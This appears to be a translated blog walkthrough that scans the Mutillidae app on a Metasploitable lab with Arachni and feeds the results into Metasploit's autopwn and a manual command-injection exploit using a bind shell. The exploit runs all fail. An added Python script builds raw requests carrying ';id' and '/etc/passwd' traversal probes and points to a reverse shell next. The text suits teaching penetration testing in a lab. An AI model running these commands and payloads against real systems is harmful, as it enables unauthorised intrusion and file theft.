WebApp exploitation with Arachni and Metasploit

http://www.milsec.net/metasploit%e5%ba%94%e7%94%a8/41.html

Arachni is an open-source web application scanner whose speed and accuracy at finding vulnerabilities in web scripts are well regarded. Like other mainstream open-source scanners it keeps up with the trend of integrating with Metasploit: an msf plugin shipped with Arachni imports its findings straight into the framework.
Today we demonstrate using Arachni together with Metasploit to scan a site and attempt to exploit what it finds. My test environment:

Metasploitable (target) + BackBox (attacker) + Arachni + Metasploit

First we scan the target with Arachni; the output speaks for itself:

root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf
WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory
Arachni - Web Application Security Scanner Framework v0.4.2
Author: Tasos "Zapotek" Laskos

(With the support of the community and the Arachni Team.)

Website: http://arachni-scanner.com
Documentation: http://arachni-scanner.com/wiki

[~] No modules were specified.
[~] -> Will run all mods.
[~] No audit options were specified.
[~] -> Will audit links, forms and cookies.

With no modules or audit options given, Arachni runs every module against links, forms and cookies. The results are saved in the metareport (.afr.msf) format so that Metasploit can load them.

To make the Arachni plugin available to Metasploit, locate the Arachni install directory and copy the contents of its external/metasploit directory into the Metasploit root (on this BackBox system that is /opt/backbox/msf, as the msfconsole warning below notes):
cp -R arachni/external/metasploit/* metasploit/

Then start Metasploit and load the Arachni plugin:

root@metasploit:~# msfconsole

[!] Warning: This tool is located in /opt/backbox/msf
[i] Remember to give the full absolute path when specifying a file

# cowsay++
 ____________
< metasploit >
 ------------
        \   ,__,
         \  (oo)____
            (__)    )\
               ||--|| *

=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1168 exploits - 641 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > load arachni
[+] Added 1 Auxiliary modules for Arachni
[+] Added 4 Exploit modules for Arachni
[*] Successfully loaded plugin: arachni
msf > arachni_load /root/localhost.afr.msf
[*] Loading report...
[*] Loaded 21 vulnerabilities.

Unique exploits
===============

ID Exploit Description
-- ------- -----------
1 auxiliary/arachni_sqlmap

Let's look at the options of Arachni's autopwn command:
msf > arachni_autopwn
[*] Usage: arachni_autopwn [options]
-h Display this help text
-x [regexp] Only run modules whose name matches the regex
-a Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-m Use a meterpreter shell (if possible)
-q Disable exploit module output

We launch every matching module against all targets (-a):

msf > arachni_autopwn -a
[*] Running pwn-jobs...

[*] [0 established sessions]): Waiting on 21 launched modules to finish execution...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
[*] Running exploit/unix/webapp/arachni_exec
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...

[*] Started bind handler
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Sending HTTP request for /mutillidae/index.php
[*] [0 established sessions]): Waiting on 0 launched modules to finish execution...

[*] The autopwn command has completed with 0 sessions
Unfortunately, not a single one succeeded.

Next, let's see exactly which vulnerabilities Arachni found:

msf > arachni_list_vulns

Vulnerabilities
===============

ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
2 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
3 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create AccountXXinjectionXX", "my_signature"=>"1"} auxiliary/arachni_sqlmap
4 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret)", "confirm_password"=>"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
5 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
6 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
7 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
8 192.168.1.35 /mutillidae/index.php SQL Injection POST {"ToolID"=>"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"} auxiliary/arachni_sqlmap
9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
10 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
11 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog EntriesXXinjectionXX", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68"} auxiliary/arachni_sqlmap
12 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog Entries", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"} auxiliary/arachni_sqlmap
13 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "username"=>"arachni_name", "password"=>"5543!%arachni_secret", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"} auxiliary/arachni_sqlmap
14 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_nameXXinjectionXX"} auxiliary/arachni_sqlmap
15 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
16 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal
20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer", "initials"=>"1", "user-poll-php-submit-button"=>"Submit Vote"} unix/webapp/arachni_path_traversal
21 192.168.1.35 /mutillidae/index.php Path Traversal POST {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal

Let me, the old-fashioned way, try exploiting vulnerability 17 by hand:

msf > arachni_manual 17
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
SRVHOST => 127.0.0.1
SRVPORT => 10401
RHOST => 192.168.1.35
RPORT => 80
LHOST => 127.0.0.1
LPORT => 5376
SSL => false
POST => target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS
METHOD => POST
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c
PATH => /mutillidae/index.php
[*] Done!
PAYLOAD => cmd/unix/bind_perl
msf exploit(arachni_exec) >

Check that the configuration is right; if nothing is wrong, run it:

msf exploit(arachni_exec) > show options

Module options (exploit/unix/webapp/arachni_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
GET no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
PATH /mutillidae/index.php yes The path to the vulnerable script.
POST target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
Proxies no Use a proxy chain
RHOST 192.168.1.35 yes The target address
RPORT 80 yes The target port
VHOST no HTTP server virtual host

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 5376 yes The listen port
RHOST 192.168.1.35 no The target address

Exploit target:

Id Name
-- ----
0 Automatic

It looks fine. Run it manually and see whether my luck holds.

-_-!!! No luck: both attempts failed.

msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) >
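Both runs return to the prompt without a session, and the module output alone does not say whether the payload ever reached the vulnerable parameter. The following added example (not code from this post, from Arachni or from Metasploit) rebuilds the raw HTTP request that the Arachni-generated module would send, from the datastore values that `arachni_manual` printed above (PATH, METHOD, GET, POST, COOKIES, HEADERS), with a payload of your choice in place of `XXinjectionXX`. That lets you fire a harmless probe first and read the response yourself. The datastore for #17 is copied from the page; the datastore for row 18, the probe payloads, the URL-encoding of substituted values and the handling of a COOKIES option alongside a Cookie header are assumptions of this example.

```python
"""Rebuild the raw HTTP request an Arachni-generated Metasploit module would
send, from the datastore values `arachni_manual` prints and a payload that
replaces the XXinjectionXX marker.

Added example, not code from the blog post, from Arachni or from Metasploit.
VULN_17 is copied from the post; VULN_18 is reconstructed from table row 18
(HEADERS assumed identical); the probe payloads are constructed here.
"""
from urllib.parse import parse_qsl, urlencode

MARKER = "XXinjectionXX"  # placeholder Arachni leaves where the payload goes


def parse_headers(spec: str) -> dict:
    """'User-Agent=bar::Cookie=a=1;b=2' -> {'User-Agent': 'bar', 'Cookie': 'a=1;b=2'}.

    Headers are '::'-separated; each is split on the FIRST '=' only, because
    the Cookie value itself contains '=' and the Accept value contains ';'.
    """
    headers = {}
    for item in spec.split("::"):
        if not item:
            continue
        name, _, value = item.partition("=")
        headers[name.strip()] = value.strip()
    return headers


def substituted_params(spec: str, payload: str) -> str:
    """Decode 'a=1&b=Lookup DNS', put the payload where the marker is and
    re-encode: a space becomes '+', ';' becomes %3B, a NUL byte becomes %00.
    (Encoding the substituted value is this example's choice.)"""
    pairs = parse_qsl(spec, keep_blank_values=True)
    return urlencode([(k, v.replace(MARKER, payload)) for k, v in pairs])


def build_request(ds: dict, payload: str) -> bytes:
    """Assemble an HTTP/1.1 request with the marker replaced in GET, POST,
    COOKIES and HEADERS. If both COOKIES and a Cookie header are set they are
    joined with '; ' (assumption: the page does not show the module's rule)."""
    method = ds.get("METHOD", "GET").upper()
    target = ds["PATH"]
    query = substituted_params(ds.get("GET", ""), payload)
    if query:
        target += "?" + query

    headers = {"Host": ds.get("VHOST") or ds["RHOST"]}
    for name, value in parse_headers(ds.get("HEADERS", "")).items():
        headers[name] = value.replace(MARKER, payload)
    cookies = ds.get("COOKIES", "").replace(MARKER, payload)
    if cookies:
        headers["Cookie"] = "; ".join(filter(None, [headers.get("Cookie"), cookies]))

    body = b""
    if method == "POST":
        body = substituted_params(ds.get("POST", ""), payload).encode()
        headers["Content-Type"] = "application/x-www-form-urlencoded"
        headers["Content-Length"] = str(len(body))

    head = [f"{method} {target} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(head) + "\r\n\r\n").encode() + body


# Datastore as printed by `arachni_manual 17` (OS command injection through
# the DNS-lookup form's target_host field).
VULN_17 = {
    "RHOST": "192.168.1.35", "RPORT": "80", "VHOST": "",
    "PATH": "/mutillidae/index.php", "METHOD": "POST",
    "GET": "", "COOKIES": "",
    "POST": "target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS",
    "HEADERS": ("Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
                "::User-Agent=Arachni/v0.4.2"
                "::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c"),
}

# Reconstructed from row 18 of `arachni_list_vulns`: path traversal where a NUL
# byte cuts off the '.php' the application appends. HEADERS assumed as in #17.
VULN_18 = dict(VULN_17, PATH="/mutillidae/", METHOD="GET", POST="",
               GET="page=XXinjectionXX\x00.php")

if __name__ == "__main__":
    # Benign probes: if the reply to the first contains the output of `id`, the
    # injection works and a failed exploit is a payload/connectivity problem.
    print(build_request(VULN_17, ";id").decode())
    print(build_request(VULN_18, "../../../../etc/passwd").decode())
```

Send the bytes with nc or replay them through an intercepting proxy and read the response. If `uid=` comes back for the `;id` probe, the vulnerability is real and the failure lies downstream: cmd/unix/bind_perl needs perl on the target and the attacker must be able to reach the bind port (LPORT) on it, so `arachni_autopwn -r` (a reverse shell) or another payload is the next thing to try. Note also that HEADERS replays Arachni's own User-Agent and the scan-time PHPSESSID, so these requests are trivially attributable in the target's logs.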

Today's test environment did not cooperate: not a single exploit landed. Still, the point here was to show the workflow of using Arachni and Metasploit together to scan and attack a web application. Just a casual walkthrough; experts can skip it, and questions are welcome in the comments!
